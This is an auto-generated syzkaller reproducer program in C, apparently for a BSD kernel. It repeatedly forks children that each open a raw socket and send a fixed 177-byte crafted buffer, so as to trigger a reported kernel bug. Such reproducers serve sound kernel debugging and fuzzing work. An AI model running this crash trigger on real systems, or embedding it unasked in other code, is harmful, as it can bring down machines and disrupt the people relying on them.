// https://syzkaller.appspot.com/bug?id=bda19bf6b14e7fddccf28ac6f0205c7df6d8c32e
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <sys/types.h>

#include <pwd.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/endian.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

static void kill_and_wait(int pid, int* status)
{
  kill(pid, SIGKILL);
  while (waitpid(-1, status, 0) != pid) {
  }
}

static void sleep_ms(uint64_t ms)
{
  usleep(ms * 1000);
}

static uint64_t current_time_ms(void)
{
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts))
    exit(1);
  return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void execute_one(void);

#define WAIT_FLAGS 0

static void loop(void)
{
  int iter = 0;
  for (;; iter++) {
    int pid = fork();
    if (pid < 0)
      exit(1);
    if (pid == 0) {
      execute_one();
      exit(0);
    }
    int status = 0;
    uint64_t start = current_time_ms();
    for (;;) {
      sleep_ms(10);
      if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid)
        break;
      if (current_time_ms() - start < 5000)
        continue;
      kill_and_wait(pid, &status);
      break;
    }
  }
}

uint64_t r[1] = {0xffffffffffffffff};

void execute_one(void)
{
  intptr_t res = 0;
  if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
  }
  res = syscall(SYS_socket, /*domain=AF_APPLETALK|AF_UNIX*/ 0x11ul,
                /*type=SOCK_RAW*/ 3ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  memcpy(
      (void*)0x200000000740,
      "\xb1\x00\x05\x03\x90\x1c\x00\x00\x05\xb1\x08\x00\x07\x00\xca\x90\x0f\x0e"
      "\x08\xfe\xce\xa1\x1e\xa8\xfe\xf9\x68\xf3\xc7\x3f\xd3\x35\x7a\xfd\xeb\x2c"
      "\x09\x00\x85\x2e\x12\x63\x36\xac\xf0\x0b\x78\x04\xbe\x78\x1e\x49\x91\xf7"
      "\xad\xdf\x5f\x88\x2b\x2b\x7b\xe1\xaa\x79\x23\xed\x00\xf4\xc8\xb2\xca\x3e"
      "\xbb\xc2\x59\x69\x9a\x1f\x13\x2e\x27\xac\xb5\xd6\x02\x00\x0d\x7d\x02\x6b"
      "\xa8\xaf\x63\xff\x37\x28\x29\x34\xe4\xfd\x89\x72\x0f\xd3\x87\x2b\xab\xfb"
      "\xb7\x70\x08\xf5\xa8\x72\xc8\x81\xff\x7c\xc5\x3c\x89\x43\x03\xb2\x2f\x31"
      "\x0b\x40\x4f\x36\xa0\x0f\x90\x00\x6e\xe0\x1b\xe6\x57\xae\xa8\xc5\x00\x00"
      "\x00\x02\x00\x00\x00\x00\x00\x00\x0f\x02\x00\xa3\x71\xa3\xf8\x00\x00\xfe"
      "\xff\xff\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00",
      177);
  syscall(SYS_sendto, /*fd=*/r[0], /*buf=*/0x200000000740ul, /*len=*/0xb1ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
int main(void)
{
  syscall(SYS_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
          /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x1012ul, /*fd=*/-1,
          /*offset=*/0ul);
  const char* reason;
  (void)reason;
  loop();
  return 0;
}